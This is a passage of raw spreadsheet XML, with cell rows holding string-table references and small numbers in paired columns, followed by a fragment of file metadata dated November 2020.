        <v>384</v>
      </c>
      <c r="D10" s="56"/>
      <c r="E10" s="56" t="s">
        <v>388</v>
      </c>
      <c r="F10" s="56"/>
      <c r="G10" s="56" t="s">
        <v>392</v>
      </c>
      <c r="H10" s="56"/>
      <c r="I10" s="56" t="s">
        <v>398</v>
      </c>
      <c r="J10" s="56"/>
      <c r="K10" s="56" t="s">
        <v>402</v>
      </c>
      <c r="L10" s="56"/>
      <c r="M10" s="56" t="s">
        <v>406</v>
      </c>
      <c r="N10" s="56"/>
      <c r="O10" s="56" t="s">
        <v>410</v>
      </c>
      <c r="P10" s="46"/>
    </row>
    <row r="11" customFormat="false" ht="14" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A11" s="37" t="s">
        <v>415</v>
      </c>
      <c r="B11" s="37" t="s">
        <v>416</v>
      </c>
      <c r="C11" s="37" t="s">
        <v>415</v>
      </c>
      <c r="D11" s="37" t="s">
        <v>416</v>
      </c>
      <c r="E11" s="37" t="s">
        <v>415</v>
      </c>
      <c r="F11" s="37" t="s">
        <v>416</v>
      </c>
      <c r="G11" s="37" t="s">
        <v>415</v>
      </c>
      <c r="H11" s="37" t="s">
        <v>416</v>
      </c>
      <c r="I11" s="37" t="s">
        <v>415</v>
      </c>
      <c r="J11" s="37" t="s">
        <v>416</v>
      </c>
      <c r="K11" s="37" t="s">
        <v>415</v>
      </c>
      <c r="L11" s="37" t="s">
        <v>416</v>
      </c>
      <c r="M11" s="37" t="s">
        <v>415</v>
      </c>
      <c r="N11" s="37" t="s">
        <v>416</v>
      </c>
      <c r="O11" s="37" t="s">
        <v>415</v>
      </c>
      <c r="P11" s="37" t="s">
        <v>416</v>
      </c>
    </row>
    <row r="12" customFormat="false" ht="14" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A12" s="37" t="s">
        <v>393</v>
      </c>
      <c r="B12" s="37" t="n">
        <v>0</v>
      </c>
      <c r="C12" s="37" t="s">
        <v>393</v>
      </c>
      <c r="D12" s="37" t="n">
        <v>0</v>
      </c>
      <c r="E12" s="37" t="s">
        <v>393</v>
      </c>
      <c r="F12" s="37" t="n">
        <v>0</v>
      </c>
      <c r="G12" s="37" t="s">
        <v>393</v>
      </c>
      <c r="H12" s="37" t="n">
        <v>0</v>
      </c>
      <c r="I12" s="37" t="s">
        <v>393</v>
      </c>
      <c r="J12" s="37" t="n">
        <v>0</v>
      </c>
      <c r="K12" s="37" t="s">
        <v>393</v>
      </c>
      <c r="L12" s="37" t="n">
        <v>0</v>
      </c>
      <c r="M12" s="37" t="s">
        <v>393</v>
      </c>
      <c r="N12" s="37" t="n">
        <v>0</v>
      </c>
      <c r="O12" s="37" t="s">
        <v>393</v>
      </c>
      <c r="P12" s="37" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="13" customFormat="false" ht="14" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A13" s="37" t="s">
        <v>381</v>
      </c>
      <c r="B13" s="37" t="n">
        <v>2</v>
      </c>
      <c r="C13" s="37" t="s">
        <v>440</v>
      </c>
      <c r="D13" s="37" t="n">
        <v>1</v>
      </c>
      <c r="E13" s="37" t="s">
        <v>389</v>
      </c>
      <c r="F13" s="37" t="n">
        <v>1</v>
      </c>
      <c r="G13" s="37" t="s">
        <v>441</v>
      </c>
      <c r="H13" s="37" t="n">
        <v>1</v>
      </c>
      <c r="I13" s="37" t="s">
        <v>442</v>
      </c>
      <c r="J13" s="37" t="n">
        <v>1</v>
      </c>
      <c r="K13" s="37" t="s">
        <v>443</v>
      </c>
      <c r="L13" s="37" t="n">
        <v>1</v>
      </c>
      <c r="M13" s="37" t="s">
        <v>444</v>
      </c>
      <c r="N13" s="37" t="n">
        <v>2</v>
      </c>
      <c r="O13" s="37" t="s">
        <v>411</v>
      </c>
      <c r="P13" s="0" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="14" customFormat="false" ht="14" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A14" s="37" t="s">
        <v>445</v>
      </c>
      <c r="B14" s="37" t="n">
        <v>6</v>
      </c>
      <c r="C14" s="37" t="s">
        <v>446</v>
      </c>
      <c r="D14" s="37" t="n">
        <v>3</v>
      </c>
      <c r="E14" s="37" t="s">
        <v>447</v>
      </c>
      <c r="F14" s="37" t="n">
        <v>5</v>
      </c>
      <c r="G14" s="37" t="s">
        <v>448</v>
      </c>
      <c r="H14" s="37" t="n">
        <v>7</v>
      </c>
      <c r="I14" s="37" t="s">
        <v>399</v>
      </c>
      <c r="J14" s="37" t="n">
        <v>3</v>
      </c>
      <c r="K14" s="37" t="s">
        <v>403</v>
      </c>
      <c r="L14" s="37" t="n">
        <v>4</v>
      </c>
      <c r="M14" s="37" t="s">
        <v>407</v>
      </c>
      <c r="N14" s="37" t="n">
        <v>5</v>
      </c>
      <c r="O14" s="37" t="s">
        <v>449</v>
      </c>
      <c r="P14" s="0" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="15" customFormat="false" ht="14" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A15" s="37" t="s">
        <v>450</v>
      </c>
      <c r="B15" s="37" t="n">
        <v>7</v>
      </c>
      <c r="C15" s="37" t="s">
        <v>451</v>
      </c>
      <c r="D15" s="37" t="n">
        <v>5</v>
      </c>
      <c r="E15" s="37" t="s">
        <v>452</v>
      </c>
      <c r="F15" s="37" t="n">
        <v>7</v>
      </c>
      <c r="G15" s="37" t="s">
        <v>453</v>
      </c>
      <c r="H15" s="37" t="n">
        <v>9</v>
      </c>
      <c r="I15" s="37" t="s">
        <v>454</v>
      </c>
      <c r="J15" s="37" t="n">
        <v>7</v>
      </c>
      <c r="K15" s="37" t="s">
        <v>455</v>
      </c>
      <c r="L15" s="37" t="n">
        <v>5</v>
      </c>
      <c r="M15" s="37" t="s">
        <v>456</v>
      </c>
      <c r="N15" s="37" t="n">
        <v>7</v>
      </c>
      <c r="O15" s="37" t="s">
        <v>457</v>
      </c>
      <c r="P15" s="0" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="16" customFormat="false" ht="14" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A16" s="37" t="s">
        <v>458</v>
      </c>
      <c r="B16" s="37" t="n">
        <v>9</v>
      </c>
      <c r="C16" s="37" t="s">
        <v>459</v>
      </c>
      <c r="D16" s="37" t="n">
        <v>7</v>
      </c>
      <c r="E16" s="37" t="s">
        <v>460</v>
      </c>
      <c r="F16" s="37" t="n">
        <v>9</v>
      </c>
      <c r="G16" s="37"/>
      <c r="H16" s="37"/>
      <c r="I16" s="37" t="s">
        <v>461</v>
      </c>
      <c r="J16" s="37" t="n">
        <v>9</v>
      </c>
      <c r="K16" s="37" t="s">
        <v>462</v>
      </c>
      <c r="L16" s="37" t="n">
        <v>9</v>
      </c>
      <c r="M16" s="37"/>
      <c r="N16" s="37"/>
      <c r="O16" s="37" t="s">
        <v>463</v>
      </c>
      <c r="P16" s="0" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="17" customFormat="false" ht="14" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A17" s="37"/>
      <c r="B17" s="37"/>
      <c r="C17" s="37" t="s">
        <v>385</v>
      </c>
      <c r="D17" s="37" t="n">
        <v>9</v>
      </c>
      <c r="E17" s="37"/>
      <c r="F17" s="37"/>
      <c r="G17" s="37"/>
      <c r="H17" s="37"/>
      <c r="I17" s="37"/>
      <c r="J17" s="37"/>
      <c r="K17" s="37"/>
      <c r="L17" s="37"/>
      <c r="M17" s="37"/>
      <c r="N17" s="37"/>
      <c r="O17" s="3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
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-15T16:35:07Z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